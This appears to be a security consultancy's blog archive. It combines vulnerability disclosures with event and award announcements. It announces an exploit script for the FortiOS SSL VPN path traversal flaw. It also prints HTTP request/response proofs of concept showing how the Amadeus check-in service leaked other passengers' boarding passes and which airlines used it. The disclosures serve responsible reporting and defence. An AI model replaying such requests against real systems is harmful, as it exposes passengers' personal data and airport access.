Exploit Script for CVE-2018-13379

While conducting further analysis of the path traversal vulnerability within the FortiOS SSL VPN web portal, the team at 7 Elements created a script to enumerate vulnerable hosts and extract sensitive information such as user names and passwords.

The following video shows the tool in action with the ability to scan multiple hosts (the script used for the purpose of the video masks sensitive information):

Using the script it was possible to enumerate ~200k hosts globally, identifying around 20,000 vulnerable hosts and extract over 60,000 credentials (further blog post to follow).

Both the NSA and NCSC have recently posted advisories alerting on the use of this vulnerability by Nation State Advanced Persistent Threat (APT) actors to gain access to enterprise environments.

Over three weeks prior to the advisories, the team here at 7 Elements identified that what was then being reported as a medium level risk issue, was in fact a critical impact issue. More on that can be found here.

Today we have released a  version of the script that is limited to a single IP/Host to enable testing against devices owned by the individual running the script. The tool can be downloaded here.

 

CYBERISLE 2019

CYBERISLE 2019 is the Isle of Man government’s flagship cyber security event.

Hosted by the Office of Cyber Security & Information Assurance (OCSIA), CYBERISLE 2019 features world-class speakers, solutions and opportunities for interaction between the public and private sectors. The event is free to attend and will be at the Royal Hall, Villa Marina, Douglas, Isle of Man on the 23rd October 2019.

As part of the event, our CEO, Dave Stubley will deliver a talk on Protecting the Enterprise: Business Email Compromise.

Talk Introduction:

What does a successful compromise of an organisations email system look like and what can we do to protect ourselves?

A recent study by the U.S. Treasury Department revealed that business email compromise scams were costing U.S. companies more than $300 million a month, and the FBI warned that the total financial loss globally due to BEC attacks is at least $12.5 billion. Closer to home: UK’s National Cyber Security Centre (NCSC) reported that BEC attacks cost UK businesses £32 million (in 2017/18).

This talk will use real-life case studies from recent incidents to dissect the anatomy of a modern Business Email Compromise (BEC) attack, from current attack trends to mailbox manipulation and exfiltration of sensitive data through to onward compromise of new mailboxes. Building on this knowledge we will then explore easy to implement mitigation strategies.

For more information about CYBERISLE 2019 and to register, please visit the events page here.

Airline Enumeration within Amadeus Check-in Application

Advisory Information

Title: Airline Enumeration within Amadeus Check-in Application

Date Published: 16th July 2019

Author: David Stubley, david.stubley@7elements.co.uk, @DavidStubley (twitter)

Advisory Summary

It was possible to enumerate supported airlines of the Amadeus Check-in Application using the URL generated as part of an airline mobile application check-in process.

Example of a link to a boarding pass generated by the platform:

https://checkin.si.amadeus.net/1ASIHSSCWEBQS/sscwqs/mbp?IFOI=DCS&id=440968951&ln=en&productIndex=0

(URL provided is no longer valid as it is past the departure time).

The highlighted ‘QS‘ relates to the use of IATA airline codes.

PoC

The following proof of concept shows that due to a lack of authentication required for access to the resource as well as a lack of brute force protection, it was possible to automate an attack to enumerate supported airlines.

Request

GET /1ASIHSSCWEB§OA§/sscw§oa§/mbp?IFOI=DCS&id=300193064&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 12 Jul 2019 11:48:30 GMT
Content-Type: text/html
Connection: close
Content-Length: 7078

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<title>Olympic Air Internet check in</title>

Using Burp to do the heavy lifting:

Timeline

Advisory sent – 10th July 2019

Requested confirmation that the advisory has been received by Amadeus – 11th July 2019

Update and confirmation that Amadeus are taking remediation action (advised via FlyBe) – 11th July 2019

Advised Civil Aviation Authority (CAA) on vulnerability – 11th July 2019

Requested update from Amadeus and provided notice to publish – 12th July 2019

Remediation activity completed by Amadeus (based upon dates provided by FlyBe) – 15th July 2019

Advisory published by 7 Elements – 16th July 2019

Insecure Direct Object Reference within Amadeus Check-in Application

Advisory Information

Title: Insecure Direct Object Reference within Amadeus Check-in Application

Date Published: 16th July 2019

Author: David Stubley, david.stubley@7elements.co.uk, @DavidStubley (twitter)

Advisory Summary

It was possible to download valid boarding passes (not belonging to the user) for future flights due to a weakness within the application (Insecure Direct Object Reference).

Example of a link to a boarding pass not belonging to the user:

https://checkin.si.amadeus.net/1ASIHSSCWEBQS/sscwqs/mbp?IFOI=DCS&id=300193064&ln=en&productIndex=0

Insecure Direct Object Reference or IDOR vulnerabilities occur when an application provides direct access to objects based on user-supplied input, bypassing expected authentication and user access controls.

The vulnerable site is: https://checkin.si.amadeus.net

The vulnerable parameter is the ID field within the /mbp application end point.

PoC

The following proof of concept shows access to a boarding pass not associated with the user.

Step One: First intercept a request to generate a boarding pass:

Request:

GET /1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=104421747&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Jul 2019 10:41:28 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 70581

%PDF-1.3
%âãÏÓ
1 0 obj<</Type/Catalog/Outlines 57 0 R/Pages 3 0 R>>
endobj
{snip}

Step Two: Change to the id parameter to access a boarding pass not associated with the user:

Request:

GET /1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=10442131&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Jul 2019 10:44:13 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 70764

%PDF-1.3
%âãÏÓ
1 0 obj<</Type/Catalog/Outlines 57 0 R/Pages 3 0 R>>
endobj
{snip}

Response shows a valid pdf document returned to the user.

Timeline

Advisory sent – 8th July 2019 (to FlyBe), 10th July 2019 (to Amadeus)

Requested confirmation that the advisory has been received by Amadeus – 11th July 2019

Update and confirmation that Amadeus are taking remediation action (advised via FlyBe) – 11th July 2019

Advised Civil Aviation Authority (CAA) on vulnerability – 11th July 2019

Requested update from Amadeus and provided notice to publish  – 12th July 2019

Remediation activity completed by Amadeus (based upon dates provided by FlyBe) – 15th July 2019

Advisory published by 7 Elements – 16th July 2019

I know what you did this summer…

Introduction

In a recent technical advisory that can be found here, 7 Elements discovered that it was possible to download valid boarding passes (not belonging to the user) for future flights that impacted all airlines using the Amadeus Check-in platform. This was due to a weakness within the application known as an IDOR vulnerability (Insecure Direct Object Reference). See OWASP for more background on IDOR.

The following images show two boarding passes obtained through the IDOR vulnerability before the issue was remediated by Amadeus:

 

Impact

The IDOR vulnerability combined with the ability to determine all airlines using the platform, makes this an issue that impacts Amadeus globally and impacted all airlines utilising the platform. The issue also highlights the importance of gaining assurance that commercial off-the-shelf (COTS) based solutions are fit for purpose and not placing trust in the solution providers hands. As with most things in life, the old saying of ‘Trust but Verify’ is still king.

PII – Downloading of valid boarding passes discloses customer names and flight details. The boarding pass also contains the booking reference. With that and the surname it would be possible to gain access to the booking and further sensitive information such as contact details (mobile phone etc).

Access to Restricted Areas – While further ID checks should prohibit actual use of another users boarding pass to gain access to the flight. The boarding pass could provide access to airside within the departure terminal. As such, malicious use of this issue could result in unauthorised access to all airports serviced by those airlines using the Amadeus platform. It should be noted that additional security controls may restrict the successful use of a boarding pass that has already been used to gain access airside. However, those controls are not uniformly deployed across all airports.

Details

When using an airline branded mobile application to check-in, it was noted that the mobile application makes a call to the Amadeus hosted application to retrieve the boarding pass.

Screenshot showing the link to ‘Display Boarding Passes’:

Clicking on the link prompts the following response:

Opening a new web page to display the boarding pass.

The URL accessed contains a parameter called ID. By changing the value within the ID parameter, it was possible to access other valid boarding passes.

Example URL:

https://checkin.si.amadeus.net/1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=104421747&ln=en&productIndex=0

The structure of the web request allows for other airlines that utilise the Amadeus platform to be targeted by changing the following two letter codes to match the relevant IATA airline code:

Example of a FlyBe request:

https://checkin.si.amadeus.net/1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=104421747&ln=en&productIndex=0

Example of a Smartwings request:

https://checkin.si.amadeus.net/1ASIHSSCWEBQS/sscwqs/mbp?IFOI=DCS&id=440968951&ln=en&productIndex=0

(URLs provided are no longer valid as it is past the departure time).

Further to the IDOR vulnerability, it should be noted that there was a lack of authentication required for access to the resource as well as a lack of brute force protection. Given this, it was possible to automate an attack to enumerate supported airlines and valid ID values for boarding passes relating to any airline using the platform.

Screenshot showing the enumeration of airline companies using the Check-in platform:

PoC

The following proof of concept shows access to a boarding pass not associated with the user.

Step One: First intercept a request to generate a boarding pass:

Request:

GET /1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=104421747&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Jul 2019 10:41:28 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 70581

%PDF-1.3
%âãÏÓ
1 0 obj<</Type/Catalog/Outlines 57 0 R/Pages 3 0 R>>
endobj
{snip}

Two: Change to the id parameter to access a boarding pass not associated with the user:

Request:

GET /1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=10442131&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Jul 2019 10:44:13 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 70764

%PDF-1.3
%âãÏÓ
1 0 obj<</Type/Catalog/Outlines 57 0 R/Pages 3 0 R>>
endobj
{snip}

Response shows a valid pdf document returned to the user.

 

Threat Hunting

The sides from ‘Threat Hunting in the O365 Ecosystem’ given at the International Conference on Big Data in Cyber Security are now online and can be found here:

.

The video of the talk can be found here:

DL100 Cyber Resilience Innovation of the Year

7 Elements shortlisted in DL100 Cyber Resilience Innovation of the Year category for second year!

7 Elements are delighted that our Incident Response Partnership has been shortlisted for the second year in a row in the DL100 Cyber Resilience Innovation of the Year category. We are very proud of our incident response service and are excited by the external recognition we are gaining from our peers!

What makes our approach different? In short, no up-front costs and establishing a robust partnership model that delivers when needed. Our partnership clients only ever pay for effort that they use and based on agreed upfront costs, so that there are no unwelcome surprises.

David Stubley, CEO 7 Elements

Positive and robust cyber resilience is now a fundamental business enabler. The ability of organised criminal gangs and motivated attackers to target organisations via the Internet has increased to a level where they are capable of executing attacks with little financial outlay, that can result in huge financial gain for them, while causing both financial loss and reputational damage for the targeted organisation. Even non-targeted attacks can have catastrophic consequences and result in down time and financial loss. Having a robust approach to incident response that is both flexible and proportional is now a key requirement for any organisation doing business online. Our incident response partnership is designed to give SME’s access to the same level of incident response services as Blue-chip companies without the high costs.

Recent feedback from one of our clients dealing with a breach that resulted in financial loss:

We engaged 7 Elements to help us while dealing with a recent security issue. We found them to be extremely responsive and able to present their findings with real clarity, together with a comprehensive step by step plan. Which on implementation, allowed us to give confidence to our Board and shareholders that the issues were not only understood but that all measures had been taken to ensure that there would be no repeat in future. We would recommend anyone not to rely solely on their IT provider, but to obtain advice on security from an expert, as prevention is the best cure and compromising on cybersecurity can prove extremely costly. We continue to work with David and his team at 7 Elements and cannot recommend them highly enough.

CFO, Commercial Property Developer

 

If you would like to know more and get on the front foot when dealing with cyber security incidents, then get in touch with the team.

As of the 12th April 2018, voting has now opened for each of the DL100 categories and we would like to take this opportunity to ask for your vote.

The DL100 winners will be announced at the awards dinner on the 21st June at the Sheraton Grand in London.

 

More information on our Incident Response Partnership can be found here.

International Conference of Big Data in Cyber Security

International Conference of Big Data in Cyber Security

Our CEO, David Stubley will be speaking in Edinburgh at the International Conference on Big Data in Cyber Security on the 31st May 2018 at Napier University. With the threats to organisations increasing day by day, many organisations are moving towards SIEM (Secure Incident Event Management) to detect malicious activity. SIEM is now being applied in many different processes across the industry including security monitoring, incident response and cyber crime investigation.

The big data conference brings together industry, academia and law enforcement to share insights, ideas, expertise and resources in responding to current security challenges, and to look at the opportunities and challenges in managing and using big data in a cyber security context. The conference also aims to showcase a good practice in industry and network investigations.

The conference hopes to cover the following areas:

  • insights into current high-profile security incidents, their impact, and how they are reported.
  • impact of GDPR.
  • key threats and risks associated with losing business critical data.
  • leading tools, techniques and insights in network threat analysis, detection and investigation.
  • best practice in implementing SIEM strategy.
  • developing and testing effective incident response.
  • evolution of the Security Operations Centre (SOC) and its emerging future requirements.
  • the need for skills, knowledge and awareness across an organisation.
  • latest research and innovation around threat discovery, machine learning, and data analysis.

David Stubley will be discussing ‘threat hunting in the Office 365 ecosystem’ at 2 pm in the Lindsay Stewart Theatre.

If you would like to know more about how we approach incident response, then please get in touch with our team.

Scottish Cyber Awards 2017

The Scottish Cyber Awards are back!

The Scottish Cyber Awards are returning this November and it looks set to be another great night. Last year, the event was a fantastic celebration of the Cyber Security community in Scotland and we hope this year will be even more successful!

 

As an Information Security Consultancy operating in Scotland, the Scottish Cyber Awards are close to our hearts, as we strongly believe that there is a talented InfoSec community here. We were delighted to be part of this event, both with sponsoring an award and our CEO, David Stubley, acted as a judge for the entries. David said that;

It was difficult to pick winners in some categories because the level of competition was so high, but it is fantastic to help give the winners the recognition that they deserve.

 

Last year, we were thrilled to be awarded the ‘Cyber SME Defender of the Year’ award and this year are looking forward to passing the baton on to our successor. As an SME ourselves, we know the important role that Cyber SME’s provide, which is why we were delighted to sponsor this award and are looking forward to congratulating this year’s worthy winner.

The Scottish Cyber Awards are being held at the Sheraton Hotel, Edinburgh on the 22nd November 2017.

Fraud and Breach Prevention Summit

Fraud & Breach Prevention Summit: London (17th and 18th October)

7 Elements are proud to be a sponsor of this year’s Fraud & Breach Prevention Summit in London.

We believe this summit is important in bringing the topic of security breaches into the public conscious. As an information security consultancy delivering incident response capability for our clients, we are well placed to see the rising numbers of breaches.

Breaches happen to all types organisation regardless of size or industry and it is important to know how to deal with them effectively.

Our CEO, David Stubley, will be taking part in the following two panels and presenting on the topic of incident response:

  • ‘We’ve Been Breached: Now What? How to Effectively Work with Law Enforcement’
    15:20 on the 17th of October. The panel will discuss the importance of planning when it comes to incident response and working proactively with law enforcement.
  • ‘Equifax Breach: Long-term Implications. What Does It Mean for Europe?’
    16:05 on the 17th of October. The panel will discuss the long-term implication of the Equifax breach and the lessons that all organisations should learn from it.
  • In ‘Disaster Strikes: Here’s Your Incident Response Playbook’, David will discuss the five core principles all organisations should apply when responding to an incident. The talk will take place at 12:55 on the 18th of October.